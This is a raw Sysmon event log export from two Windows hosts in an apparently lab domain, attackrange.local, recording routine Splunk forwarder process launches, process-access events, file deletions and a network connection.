23542300x8000000000000000106697Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:01.995{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FCBCBCC1F02FC84B139F3A9301B97A4,SHA256=77E25BFBFCB04955F2DC7F01DDF7CA98E42E219A2A5F7A0065BD284E1CF7B7EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083105Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:01.432{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD416847CDC59D8D3CFCB6E0A211D6F4,SHA256=016AED1FF3AD66D982EA44D6E5E394938AEB730407F960B3C8F1485FBA2DE748,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106696Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:00.422{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51855-false10.0.1.12-8000- 23542300x800000000000000083106Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:02.447{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE64F583EFA79A233D02A7135903CBA7,SHA256=E347E51EAF1B53CC84AB1FE384245480357E553CF70BD0155BA1AFB44F361890,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106706Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.364{58E9C193-B482-615A-3402-00000000FC01}52924460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106705Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B482-615A-3402-00000000FC01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106704Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106703Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106702Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106701Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106700Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B482-615A-3402-00000000FC01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106699Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.111{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B482-615A-3402-00000000FC01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106698Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:02.112{58E9C193-B482-615A-3402-00000000FC01}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083107Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:03.447{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D3EE453D3C81297838AC0B42EA9C0FD,SHA256=10BD7034E236AD18AE1CA9412D1511812BC3905815991E0BCCEF0EA6E8A99985,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106725Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B483-615A-3602-00000000FC01}7180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106724Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106723Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106722Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106721Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106720Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B483-615A-3602-00000000FC01}7180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106719Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B483-615A-3602-00000000FC01}7180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106718Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.912{58E9C193-B483-615A-3602-00000000FC01}7180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000106717Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.465{58E9C193-B483-615A-3502-00000000FC01}2203756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106716Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.243{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B483-615A-3502-00000000FC01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106715Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106714Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106713Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106712Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.225{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106711Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.225{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B483-615A-3502-00000000FC01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106710Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.225{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B483-615A-3502-00000000FC01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106709Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:03.239{58E9C193-B483-615A-3502-00000000FC01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 